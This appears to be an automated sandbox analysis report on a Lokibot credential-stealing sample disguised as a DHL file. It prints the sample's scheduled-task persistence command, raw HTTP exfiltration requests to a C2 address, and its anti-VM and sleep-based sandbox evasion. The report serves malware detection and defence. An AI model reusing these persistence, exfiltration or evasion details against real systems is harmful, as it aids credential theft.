
Analysis Report DHL FILE 267382.exe

Overview

General Information

Sample Name: DHL FILE 267382.exe
Analysis ID: 299736
MD5: 72fb9a400177dfd9b010ed127537fe3e
SHA1: 27ed71ca36a0a51c746a033d86e664a0fc7615f5
SHA256: 0969f9b67bae5ccaa7d4b2fd6fa97a6f6accbc890711f6f3f9361302d9e832c4
Tags: DHL, exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • DHL FILE 267382.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\DHL FILE 267382.exe' MD5: 72FB9A400177DFD9B010ED127537FE3E)
    • schtasks.exe (PID: 6664 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12d347:$des3: 68 03 66 00 00
  • 0x131738:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x131804:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.DHL FILE 267382.exe.400000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
3.2.DHL FILE 267382.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
3.2.DHL FILE 267382.exe.400000.0.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
3.2.DHL FILE 267382.exe.400000.0.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
3.2.DHL FILE 267382.exe.400000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL FILE 267382.exe', ParentImage: C:\Users\user\Desktop\DHL FILE 267382.exe, ParentProcessId: 6600, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', ProcessId: 6664

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe | ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: DHL FILE 267382.exe | ReversingLabs: Detection: 22%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DHL FILE 267382.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 195.69.140.147:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 195.69.140.147:80
Source: Joe Sandbox View | IP Address: 195.69.140.147 195.69.140.147
Source: Joe Sandbox View | ASN Name: XSGGE XSGGE
Source: global traffic | HTTP traffic detected (2 identical entries):
    POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 195.69.140.147
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: D947F2B4
    Content-Length: 192
    Connection: close
Source: global traffic | HTTP traffic detected (2 identical entries):
    POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 195.69.140.147
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: D947F2B4
    Content-Length: 165
    Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 195.69.140.147 (39 identical entries)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_00404ED4 recv,
Source: unknown | HTTP traffic detected:
    POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 195.69.140.147
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: D947F2B4
    Content-Length: 192
    Connection: close
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Sun, 18 Oct 2020 06:34:06 GMT
    Server: Apache
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7
Source: DHL FILE 267382.exe, 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL FILE 267382.exe, DHL FILE 267382.exe, 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 0_2_0179C124
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 0_2_0179E570
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 0_2_0179E560
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_0040549C
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_004029D4
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: String function: 00405B6F appears 42 times
Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMARCUS.dll4 vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.236119428.0000000006300000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.237012698.0000000006CD0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000003.00000002.243530574.000000000071C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe | Binary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: DHL FILE 267382.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: wmiRSwSoPk.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.spyw.evad.winEXE@6/5@0/1
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File created: C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp
Source: DHL FILE 267382.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DHL FILE 267382.exe | ReversingLabs: Detection: 22%
Source: DHL FILE 267382.exe | String found in binary or memory (2 identical entries): 9x+th+vJO+vC+vpy/t2jn/Z/17/vx+PAu+/G/vlx/Dh/jqPlvK/WP/add9/7o/zyvvP8Oe/16fPn/D8/z0D1/1//Ty/Nu/bt/HN/7Fje6BNz/28/fx/WP/na/Xt//Oz/389/Lj/vc/fe/fd+3fL6H/35/3j/3e3/72D//i+/trfs/f4/t1/Pe+v7+3trq/d9/10/T4//W/vF+/K//F//bz//83x/v48/R9/f8vu4/Jz/p0/dU0+/zZZz/efr/fU7fT97
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File read: C:\Users\user\Desktop\DHL FILE 267382.exe
Source: unknown | Process created: C:\Users\user\Desktop\DHL FILE 267382.exe 'C:\Users\user\Desktop\DHL FILE 267382.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: DHL FILE 267382.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL FILE 267382.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match | File source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
Source: Yara match | File source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 0_2_070B18E5 push FFFFFF8Bh; iretd
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_00402AC0 push eax; ret (2 identical entries)
Source: initial sample | Static PE information: section name: .text entropy: 7.59320889202 (2 identical entries)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process information set: NOOPENFILEERRORBOX (this evidence line is repeated 31 times in the original report)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process information set: NOGPFAULTERRORBOX (this evidence line is repeated 115 times in the original report)
NOOPENFILEERRORBOX and NOGPFAULTERRORBOX are the SEM_NOOPENFILEERRORBOX and SEM_NOGPFAULTERRORBOX flags of SetErrorMode: they suppress the "file not found" dialog and the crash (general protection fault) dialog, so a failed or crashing run leaves no window for the user to notice. This is dialog suppression, not a boot-persistence mechanism; only the schtasks entry above belongs under Boot Survival.

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000000.00000002.233842339.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
(NECVMWar / VMware_SATA_CD00 is the vendor/product string of VMware's virtual SATA CD-ROM, and {53f5630d-b6bf-11d0-94f2-00a0c91efb8b} is GUID_DEVINTERFACE_CDROM, so this is a device-interface enumeration looking for VMware hardware.)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6604 | Thread sleep time: -41500s >= -30000s
Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6620 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6712 | Thread sleep time: -120000s >= -30000s
(922337203685477 is TimeSpan.MaxValue expressed in milliseconds, so thread 6620 is parked indefinitely rather than sleeping for a chosen period, whatever the report's unit suffix suggests; the 41500 and 120000 values on threads 6604 and 6712 are the timed delays a sandbox should shorten.)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMware
